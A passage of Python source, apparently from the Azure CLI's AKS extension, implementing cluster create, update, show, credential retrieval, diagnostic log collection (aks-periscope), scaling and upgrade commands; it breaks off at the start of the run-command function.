raise CLIError(
'"--admin-aad-object-id" can only be used together with "--enable-aad"')
if enable_azure_rbac is True:
raise CLIError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges)
identity = None
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
raise CLIError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
'kubeletidentity': ManagedClusterPropertiesIdentityProfileValue(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(cmd.cli_ctx, cluster_identity_object_id, assign_kubelet_identity)
pod_identity_profile = None
if enable_pod_identity:
if not enable_managed_identity:
raise CLIError(
'--enable-pod-identity can only be specified when --enable-managed-identity is specified')
pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
_ensure_pod_identity_kubenet_consent(
network_profile, pod_identity_profile, enable_pod_identity_with_kubenet)
enable_rbac = True
if disable_rbac:
enable_rbac = False
auto_upgrade_profile = None
if auto_upgrade_channel is not None:
auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(
upgrade_channel=auto_upgrade_channel)
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile,
auto_upgrade_profile=auto_upgrade_profile,
pod_identity_profile=pod_identity_profile,
identity_profile=identity_profile,
disable_local_accounts=bool(disable_local_accounts))
if node_resource_group:
mc.node_resource_group = node_resource_group
use_custom_private_dns_zone = False
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError(
"Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if private_dns_zone:
if not enable_private_cluster:
raise CLIError(
"Invalid private dns zone for public cluster. It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM and private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_NONE:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise CLIError(private_dns_zone +
" is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise CLIError(
"--fqdn-subdomain should only be used for private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = get_aks_custom_headers(aks_custom_headers)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
disable_local_accounts=False,
enable_local_accounts=False,
yes=False,
tags=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False):
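    # Work out which update categories were requested up front; if nothing at all was
    # asked for, the command errors out below instead of issuing a no-op PUT.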
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
       not update_lb_profile and \
       api_server_authorized_ip_ranges is None and \
       not update_pod_security and \
not uptime_sla and \
not no_uptime_sla and \
not enable_aad and \
not update_aad_profile and \
not enable_ahub and \
not disable_ahub and \
not auto_upgrade_channel and \
not enable_managed_identity and \
not assign_identity and \
not enable_pod_identity and \
not disable_pod_identity and \
not enable_secret_rotation and \
not disable_secret_rotation and \
not tags and \
not windows_admin_password and \
not enable_local_accounts and \
not disable_local_accounts:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--no-uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--enable-managed-identity" or '
'"--enable-pod-identity" or '
'"--disable-pod-identity" or '
'"--auto-upgrade-channel" or '
'"--enable-secret-rotation" or '
'"--disable-secret-rotation" or '
'"--tags" or '
'"--windows-admin-password" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac" or '
'"--enable-local-accounts" or '
'"--disable-local-accounts"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
                       'to update per-node-pool autoscaler settings.')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if disable_local_accounts and enable_local_accounts:
raise CLIError('Cannot specify --disable-local-accounts and --enable-local-accounts '
'at the same time.')
if disable_local_accounts:
instance.disable_local_accounts = True
if enable_local_accounts:
instance.disable_local_accounts = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError(
'Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
                           '<CLUSTER_NAME>-agentpool in the MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise CLIError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if instance.auto_upgrade_profile is None:
instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()
if auto_upgrade_channel is not None:
instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
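    # Determine whether the cluster identity needs to migrate (e.g. from service principal
    # to system- or user-assigned managed identity) and confirm with the user before doing so.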
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
from knack.prompting import prompt_y_n
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update the cluster to use {} managed identity.\n'
'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
if enable_pod_identity:
if not _is_pod_identity_addon_enabled(instance):
# we only rebuild the pod identity profile if it's disabled before
_update_addon_pod_identity(
instance, enable=True,
allow_kubenet_consent=enable_pod_identity_with_kubenet,
)
if disable_pod_identity:
_update_addon_pod_identity(instance, enable=False)
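    # Snapshot which addons are currently enabled; this drives validation of the
    # secret-rotation flags and the permission-granting step after the PUT.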
    azure_keyvault_secrets_provider_addon_profile = None
    # Default to disabled so the secret-rotation checks below don't reference an
    # undefined name when the cluster has no addon profiles at all.
    azure_keyvault_secrets_provider_enabled = False
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
azure_keyvault_secrets_provider_addon_profile = instance.addon_profiles.get(CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, None)
azure_keyvault_secrets_provider_enabled = CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME].enabled
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux'].enabled
if enable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--enable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--disable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if tags:
instance.tags = tags
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
headers = get_aks_custom_headers(aks_custom_headers)
return _put_managed_cluster_ensuring_permission(cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
headers,
no_wait)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior: these fields are not sent
    by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
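    # Pick the credential endpoint based on --admin / --user, then hand the returned
    # kubeconfig to _print_or_merge_credentials to write it into the target path.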
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
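    # If no SAS token was supplied, generate a read/write token for the periscope pods to
    # upload logs and a separate read-only token for the link shown to the user.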
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
    print('If you share access to that storage account with Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
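    # Fetch the aks-periscope deployment manifest and substitute the storage account
    # name and SAS token into its base64-encoded placeholders.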
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_fqdn = fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
    print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the nodepool name or use the "az aks nodepool" command to scale a node pool.')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
        # This only provides a client-side convenience so customers can run "az aks upgrade" to upgrade all
        # nodepools of a cluster. The SDK only supports upgrading a single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                               'can only be applied to VirtualMachineScaleSets clusters.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance, custom_headers=headers)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise CLIError('Command cannot be empty.')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
